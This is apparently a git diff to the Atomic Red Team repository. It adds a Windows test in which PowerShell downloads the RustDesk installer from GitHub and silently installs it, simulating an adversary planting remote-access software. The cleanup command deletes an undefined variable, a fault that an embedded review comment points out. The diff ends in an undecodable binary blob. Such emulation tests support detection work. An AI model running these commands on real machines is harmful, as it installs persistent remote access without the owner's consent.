Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index e766aaa92c..c0bde51272 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -1223,6 +1223,7 @@ command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ec command-and-control,T1219,Remote Access Software,9,UltraViewer - RAT Execution,19acf63b-55c4-4b6a-8552-00a8865105c8,powershell command-and-control,T1219,Remote Access Software,10,UltraVNC Execution,42e51815-a6cc-4c75-b970-3f0ff54b610e,powershell command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b8128b-c5d4-4de9-bf70-e60419274562,powershell +command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test on Windows,f1641ba9-919a-4323-b74f-33372333bf0e,powershell command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index d757c94202..0b09773b66 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -814,6 +814,7 @@ command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ec command-and-control,T1219,Remote Access Software,9,UltraViewer - RAT Execution,19acf63b-55c4-4b6a-8552-00a8865105c8,powershell command-and-control,T1219,Remote Access Software,10,UltraVNC Execution,42e51815-a6cc-4c75-b970-3f0ff54b610e,powershell command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b8128b-c5d4-4de9-bf70-e60419274562,powershell +command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test on Windows,f1641ba9-919a-4323-b74f-33372333bf0e,powershell command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 7e2c164db3..c47ca46a67 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1686,6 +1686,7 @@ - Atomic Test #9: UltraViewer - RAT Execution [windows] - Atomic Test #10: UltraVNC Execution [windows] - Atomic Test #11: MSP360 Connect Execution [windows] + - Atomic Test #12: RustDesk Files Detected Test on Windows [windows] - T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1572 Protocol Tunneling](../../T1572/T1572.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 185f388f25..b632082de9 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md 
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1159,6 +1159,7 @@ - Atomic Test #9: UltraViewer - RAT Execution [windows] - Atomic Test #10: UltraVNC Execution [windows] - Atomic Test #11: MSP360 Connect Execution [windows] + - Atomic Test #12: RustDesk Files Detected Test on Windows [windows] - T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1572 Protocol Tunneling](../../T1572/T1572.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index ef25790853..b22fa9b157 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -71016,6 +71016,22 @@ command-and-control: ' name: powershell elevation_required: true + - name: RustDesk Files Detected Test on Windows + auto_generated_guid: f1641ba9-919a-4323-b74f-33372333bf0e + description: "An adversary may attempt to trick the user into downloading RustDesk + and use this to maintain access to the machine. \nDownload of RustDesk installer + will be at the destination location when successfully executed.\n" + supported_platforms: + - windows + executor: + command: |- + $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe" + Invoke-WebRequest -OutFile $file https://github.com/rustdesk/rustdesk/releases/download/1.2.3-1/rustdesk-1.2.3-1-x86_64.exe + Start-Process -FilePath $file "/S" + cleanup_command: |- + $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe" + Remove-Item $file1 -ErrorAction Ignore + name: powershell T1659: technique: modified: '2023-10-01T02:28:45.147Z' diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml index 636f33218f..daee05922c 100644 --- a/atomics/Indexes/windows-index.yaml +++ b/atomics/Indexes/windows-index.yaml 
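Review bot: The `cleanup_command` of the added RustDesk test passes `$file1` to `Remove-Item`, but the path was assigned to `$file`; `$file1` is never set, so the downloaded installer is not deleted from the user's Desktop. The line should read `Remove-Item $file -ErrorAction Ignore`. The cleanup also has no step that removes what `Start-Process -FilePath $file "/S"` installed, so a host used for this test keeps the remote access software unless it is reverted some other way. The same lines appear in the windows-index.yaml hunk and the T1219.md hunk that follow; these index and markdown files look generated, so the correction presumably belongs in the technique's YAML definition, which is not in this view.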
@@ -58415,6 +58415,22 @@ command-and-control: ' name: powershell elevation_required: true + - name: RustDesk Files Detected Test on Windows + auto_generated_guid: f1641ba9-919a-4323-b74f-33372333bf0e + description: "An adversary may attempt to trick the user into downloading RustDesk + and use this to maintain access to the machine. \nDownload of RustDesk installer + will be at the destination location when successfully executed.\n" + supported_platforms: + - windows + executor: + command: |- + $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe" + Invoke-WebRequest -OutFile $file https://github.com/rustdesk/rustdesk/releases/download/1.2.3-1/rustdesk-1.2.3-1-x86_64.exe + Start-Process -FilePath $file "/S" + cleanup_command: |- + $file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe" + Remove-Item $file1 -ErrorAction Ignore + name: powershell T1659: technique: modified: '2023-10-01T02:28:45.147Z' diff --git a/atomics/T1219/T1219.md b/atomics/T1219/T1219.md index 88bd102da1..191ab84727 100644 --- a/atomics/T1219/T1219.md +++ b/atomics/T1219/T1219.md @@ -32,6 +32,8 @@ Installation of many remote access software may also include persistence (e.g., - [Atomic Test #11 - MSP360 Connect Execution](#atomic-test-11---msp360-connect-execution) +- [Atomic Test #12 - RustDesk Files Detected Test on Windows](#atomic-test-12---rustdesk-files-detected-test-on-windows) +
@@ -528,4 +530,40 @@ start-process "PathToAtomicsFolder\..\ExternalPayloads\msp360connect.exe" /S +
+
+ +## Atomic Test #12 - RustDesk Files Detected Test on Windows +An adversary may attempt to trick the user into downloading RustDesk and use this to maintain access to the machine. +Download of RustDesk installer will be at the destination location when successfully executed. + +**Supported Platforms:** Windows + + +**auto_generated_guid:** f1641ba9-919a-4323-b74f-33372333bf0e + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +$file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe" +Invoke-WebRequest -OutFile $file https://github.com/rustdesk/rustdesk/releases/download/1.2.3-1/rustdesk-1.2.3-1-x86_64.exe +Start-Process -FilePath $file "/S" +``` + +#### Cleanup Commands: +```powershell +$file = Join-Path $env:USERPROFILE "Desktop\rustdesk-1.2.3-1-x86_64.exe" +Remove-Item $file1 -ErrorAction Ignore +``` + + + + +

n_Nc#w@Y@Ga3{D9f8aK8n&W7K>8Gj_H=I^sUV8XO+E#Kt*P9*W| zkv)i2ztp-?o4N(R>x9L0z#_)uT)I?E_wRY?5_Q+=R`7Okm5_@W9fNH@bf8jq3Tx-W zhdUk-*qPRX?a{&b8BeYLBO$OG4KLIpHx^bF{b#jo4 z>NnM^B~g8DY$yfTh}I{g?eY)Q6?{@~Z0nFbg-J^yaRxqf4Msag!nbVT*1zz!3dftm z;Pdv;Hk#O<)QTyN-)7Xv5p;j@FMusxafFtwX^~vj8Q1eWyrK#(wcV(?0566$Hb^~9 zRUKAneV!}z^u6jHS3m!`nenHbZec8yd#w3agY+Te^5gU#E?uj#c;5mWksN>=Ti^1e z&UpRp0Ts`n(nDC|^~php{m2pgCen5>XC3{;CJ@$~zuB9~%koHkk%fOLP8Y50$HD@;2B6NktdJFV=m!R}#5xH0315pV zZhexExb=4~@Ym9-v0+p@=q?M`{2_4U)OhHvVXKiamy?OsMlj8S;QTK9C7NzJ**Q4h zn-|TUHuCuEc0%ZY74!A?@UhHZ7MFF1D7=So_5=joTT9y`>{Z3c{&Ua5p!W(nv&~3m z>%zY+w)&sGB(?AaOALwxpqo|nKl$@L(SII1Wn)k>_Gn$bew+v2fu#Q-Qo`Nb|2y2s zk!Twt5t(&mF(#tO4^p~rCp`01?w)la#_rKGZ33?rMt3`TAs#oO-;<*qGyAizK36*~ z?QuCOzf}&- zxM<1dCFEYRkN2d|qCa`ct^&a}A;%o14hV*CeG7ffxEO-if74gpV|(u)P(|mmz?*79 zrJZ(9b0&9pG#zaU$;EkcN7jmy{o>seik6P6B|lu&CPr`2~ad4$Jzt83SusV zzp=~j@%nzi()&ny+YBOA*CE7wA&Q3FijE0LQK;i5GR^?m*aFBw&LAlGgF;fuvn)_cIz-fq}FAQ&#Os*vZX7|1bTx5R=( z8mb@RLrNDmd$!zeVSIzxZ3@u#mp6s(m=JjR&SCPI&Oy8pQJ;RUb=JX+BOzy#)c=uc z1Q)FLb-fPLkL@M>dy@B=Z%(t3EvNq2SDShl18JIU{^7>f>OSe|Oa_AOAf;1g|ms5DQ+5h3=mbTv@UzdOgu68!{%4a@L5Ci^T1- zZ1VYbMD(Nc(OB>ZiIe=`MiJo$MRP`*`QiNcg0lyJcJ^-EZ~o$gQxsatVB=2!G2k>)@pA=9igkuS3&~y0N-;;w`QbYT8SU&(6;fUw%N_g?`wGCMUH@xKP z_uLH?51JErZ9GCPND*2OyzHg5h2o<})u6b$sH5F?5vU0A{xzddnxE$uH5q+?Yj8ov z7QQb;_i~Sl`eKYS3{>DqHSdc6_ozAfv+FJQ%`OMOy95MHT_$EUoxS7l)<>_!{k*Vd z>u!Odv^MP=N{nZET$Nt@dNGdmrxyrmx#6LSzAW&#IB$XRI;F>&oK3mIHe56!fBzqZ zlTFfA0xZ-cc`H25d0&%>MqT~}z$tQ^xc8UZrB0uuEw$eqRQ(Mg_&vMJj!U*Du{F*q zi9+QU$Mv+?A&mT7*euP-2}}hFPmhGfM^Y&N@^dxRIV3(~!^$oif^v@+KjERAodV!N zlPo!F<_!tI>}FQW%NUQRQL}t)=L~tfXq&5t1$jeLkOGgR*Z%RmnkDn!dvjC`0O^ss z2!PDtP!||t?+*y+Ec1iY%vIG^6hb0SPtV$s#*~0Z&-rJqP?5?fNg+v{i-e!QwJD^D z@D|cNIhl(56^8U;*h`x7evgM{6aUpmx#)%9i^D@&BizH6K13siNPco%*KBmy?r{J? 
zeb8ant6y0Ky%IUly8gv{E75FT~gF+9FpU_&@AZjCU7sO>Pt7Xg#-rv(hQJDAFDsK$R|rv9e$&LD)Q zhU^%}zr+@HzXX{LP-ZyEdFnb=-(m7Y2JH66o|hr``^T3!-INUCbn0O2MTmj>&=*uK zY3A|9dn0C67S6#0LOw=12+==kq{VpoDw`9{@z^h8pisEqmw`eRr)r`3r@rTZ)nWld z=%EB>`mGHRR?-)q@R)hl=24cwlvZ$D2c(0YS4ftfZsuyWwKTAYug)0WmK3}rZ}@sU zzyA4qkDox?2e<1ys>ie4e$D99);b;9!U{4^wAwmu=O@Uo%l88WhiE-jzpIA%eQ)fA z{`N2-JKw^zyT13lHmql$!(GQ_OYh1_a<^llZ0!JNkrwEoK)x;GE!mpQ>Q>*2+Y&XK zwXMDz@;JcW=RxEuBSY+KU?c$&Y(T%%fm#DpBOohJ*WhPnt6psKM%Kv*saMpQHw8s&*UOJDM3;R3s$^NTwD+UL z%S4D=k>(2&Tan$W{G)$iaSjvdSKwr_u-QaXN;`KG99`GSvXu|{<;mTvp0 z_OHLHb)*wtE3qL50CaQ4`1jI*+ z8Uxj6&V_znN6d~w#0ucXtQNz_j&@R?4;uv+3`ga^FLYcZjmnm=9|q*Hlw9hUp_dLW z)Qbn#7vzAzJ-yVh<@Xeu|3SYr0N=zTcUjWXf^eybWn2HEYas^fkzxU@lt0y8e^d>; zc>_%D;H^N|NW|(<0ey>`g%Ip@bj^OSGq2^YBk`>Bx#=<70W+rVG%V;sbdx6E`Vpf^mh)MVDsp>#GZu3^cM zLd=ptA?PkIX;WuiMtF7N<1o%C6)d4&J#-gk^c9$6$I85uggPBb^QkGww_{~pGt=!p zPmi0o%}KM|C+xhX9$-gQTc}qXM1$C?Sp92$(9LU zM`nBmbAv+XP-2O_b4Nh8FguQX`biMY;07_61KIA+it&f|B2x1C#>(AtF4AE)06_2-fFI0B*pvUCHIeOWOv>Z zH$lGk#JLD|f>yzQNSB&`?ch|=H{XpkQN^}rm)>fyFIxw+U#a*g34sxh{ADCv>G@eQ z{?+`IKf41|RHLx0(A0NRQ(4S(K=@;oej`Z4baun!i0wlvLgCl!2I<5dENuyV&#xkO z?tL+qw!fJgJpRN9XVlMAK^O`Vd3mgOQg>XC(5dHY6@L2rKt<^Lg!MMq`}uP-y}^PS zb;8k&^(Rz9@k6XpxrT%>R7`>eyWJ^d=iO5?n+Fe@em?tfxJNJR%;^X^eM%E#=9<$L76WS32eU%c}t>BVxK@oer!BQGX zGo|V}O6iHgoE6uapxC`Ek;$~=;>}f_am}$#9F}q~(5GqdUa*)nyJz6uI7Q)ygcJ1F zs`R+2LZ=UGigEF4rN(UM77g1wP&ytsA`&4`$F^=%nGNPynk~Jq=xAZ%5^6OOtET>uG3z*~C#~ zK64hCVf<1kCuC$PsEwAm$0Iz=zEr*<&h9GZ zR#h*Lio7EXQMT(>it1B+Fw)ctd*Ja}95sG&cQRO@J-r?yjj70v?L6unV*9>0ifHbDE0qoYHgshPq?jjPp``!oqXKPc8hlyBYjtzj=oK zb%aZKyUMp!=ay}SMN$=>C!Ne$fGLhGW1Rxo4;6w=3(p~*J;{!bq-r<)DIfX=Kc%E{ zhKGPJk&(z-U|t?ufy%cb@*@ufgy&Gtv{{#U2!s+zuvRxi&83&hVLu!2pM1VW87s@s z1*S;-TOJ+)u0*_*qfA8VS59z*=(;y6{8w3zqS?(*+W38R=pT!RFG!w4Teymdj-*0H zlkoW*cE6P?|H;a}9QhwDA%W9+wDB@WK5kJU2p~KMc?SMZeq)I&Sht&TTlhCeKI_wo zU2gdbrQxRybtk%muk+Z82#<@7842kq!O-^@pOjR!PY^DYF>N~x}^q9&#=%(KoScW;hL>8n$ zIlBl6fqzo4-+&)epa9OhaFRhi;Jl0UKBKu;fry9PQydxQb)U;ax�GidM6-?3HfY 
zUh31{Sjc2g4IA*v!zQ`ra3hvR54#zm)4xHS=T_ZbMl^Bq=ZV@IimZC(V(wF5g+?{+ zcXTk2Kglw?!sNXxnx3CFZxSBjhZ$F0|2ld{H_T6Jsb>G&`&^s@9--A+S<9*jh$_Dy zL@okT_;T5~EcvQx=y98u6W8iuHYHl?-tbKx29b?MFpJb9l?s2-$#gp zbZZF$HQ)gN6(&O=zXrd6?X4%6looo;HqZg0YmRXnpjJtjFC%O%<= zt@_@4gf<%Y8S8C4Qb?uduc(M_@3ktp)wMHZT;kD+#(p=o+n@OhwA$|QMP-h z3W+USqzUJmSF8(35lcuJz&m9)2(Q*`B6Jt}AM99PDMI%Qe8z`<2RfwFrjYCu;cT|v zL>d#jMPnBpvVt-Rro@h^T0VgJ$oO3}np;I5M{G*NulH-(z%SXp*( z^J}FJSY^s=bCcNRYqE#A6PPa7R0U@5xt8T$BQ9 zb_d7i?h5=5;Re2XS$*$$)w{^OOWG^JoNx2qbC0E?DSxI-qHFH^11q51j_*iNhBan(7NerBKF@~XTeo-Hv$%|pPfoz zDw|u0%IJAkO(z6biQ#Wq5bOfV$FSafgZfqXcFzn3^r3r2R2WrrcaY1O zB6SbpJwb~b%FX`9t;Jshn?>-cImd#4!sAv3iPy2;#7y(r5)1*$>9^Q}LE2BhR_xV; z=sm6Zn@EZoliWQvXdm%B=mNe#+<6x`m|;D#B9d7+cFB8X&Oe_2{z`ME>)ycE>nc?1 zENOO^ipniLnbocDs^+X^pH{!C#yfw4AWu8g(@0%o$Gz3@wW31v}l~yDMWt;kB;1n^6wj?zqfpE^gDJY*bnBDL zcHn;#c+DUg;qiQxTT!XJLcN?xjN@O;<`1M#P2Ju!_`I&+8p=!0UTBc$gq6^;2NhHKANbp>NxWFUI+((J6}K3ildTb%s>|71h`~bQ@Q_t3l2? zS^-7%8e;|e_X070s<9&_K8u5Yv=E;Cnhi`y%?Bg3-wo_1H`gGhllz{wRqt&xyQ&&V z-tNAcmrz%fbc9lg+}=LqDN8|BpmpL*F2n?V%q9^wqze=Q!BZGHuFJKouip|=!VA>?(^NLf6w|8HY`Q_jbd9@H`UA+i1UQOd$b}J|; zyhBnEf*jV(rn##Lv|L#@V+tsm3)^vnqsT4LiyAHxn}q7VVuMY#f)#=m z2^GttrdOh%+N`6@WrZ155mabk+`aq}Q;8lT2RDRAuoe`eabH0>Q}_^64^uLQ&A*vI zm#UAmr3=ll-J9>LuF5vBXS}7!pQGFuYTg`I3BD;xz*|}JQ4*=X)!WLqIm(S4u;Sr_ zlBj^qCV*sTSzNAQ>aymVXE0E#XEp_f^%}*LqVv_p>xL+d2P{FRil5Qnqd~m%FAnE` zJxp;~EmV<=2s@?i^z5>j8i;RYZ>@nkNejBAm&d(+(9||^T}2GmbY>GF_UBSj%Evwb znq5#b_s~GVe=s25r=PX-5n3X@!wvknv(h&V`hw7AkAE4P!0nomyW=W4SjmJREH60q zc@^*w{k9_5bdjShRm@{#lTi<9_g=gF1SP;!CgKq?#TmAe2e8ir#IL)HNg9usSPKDRW zW*}L&QQEB|j1(Y|u$qLT3c{N{ZjYRu`OfTu{ zuUxj$eX;wbo9Z);F7K@_q(xyF$UyDp7~b5tVwM08W=ZOnxKp5*x#ss6JO&wkEw&L! 
zs0$P-WCk*5gR#{mJ#kT#+ORm}Olhq$AvVCw-y0|hwovJ!xk1fVj;}UG#UUpa%WsPb z{E$4E>UxW{b|YAWc?oPPsl)dQB@|s<*ne=M%^~|rTMYH7VE#gomxlN$*k`eL@!Sr6 zmE&%=9nV#8@g$KYJ%JYV(_FFVk&vrm2Iy`}t|y5^QyOWh^w_%rB23xuN=q#*sIHh_ zeGJ&4Xy8;7Zd4y%Z99rJr4dIA^)q|pk+ufo&*7YiAZ{5PWFV=XbEh`KL_P@svbt4V zyu0LRxYG3>L#Z{A!%&$R@*hLeu5TIa;Id5J3tQv*c;toB2xkh>r)j?O!^qZ><3pGG zu>jD_Ewdsb$9BGuBG0K_E}!`;9_gO6x&|a1%YCAyRwx>L(a+ok$*H(!_B5o>*qK#5 z70ldDsxF#BHv+jt6TfiUnt8gx#R2BX@VMSl4y)^}y}uj)foe(E6XhBE6L*^u_@8e~ z+?liB(yS#m+j%;QpXON#5fVTAztTq-1oSs+Fj_*Rt9r%cV+gZ}-GyF0P(o3rR`>o+ zex}}k<-t8pe?g`@95xIl5mh{e#^`d*CYf_27Ypr0IYUDTxq*+Ph+)jRy^L_N-a8|? zTKC!!$dn;d3+1C#cz10l*~B5MKYEygiJA0pOw#?@A0kdny_;mSgP|?b_TO;0!CCr< zy5=PE?t|vAIipSd+b;875%R)BzxH{UqBU|o?Y$?^F4g-LFL-XD*YEBiF6uUQXm96q z7l5lf35B1WK_A^P_u1MGr7_3gxMy zSGWnHsvSBO21{BgTA+TG5YUxMIy%4q5+?OA|3dts5`t3Q!3659bk1Y^)|WbcF6$HP2r+c8P|-0jkHqsH<3jELDMtI& z`QlUdt(QPji4d7nq6yb7%y>USq{Fh2=kuGq#FFYP(i~bIshfAvk%9JA>-npJ%GV`r z(@>d^cw(>R;9>dfroVGQK?(6&txZjRc{f%L;h$;Mcn^^6iu+UEpUq6nYtu&MQTwjy 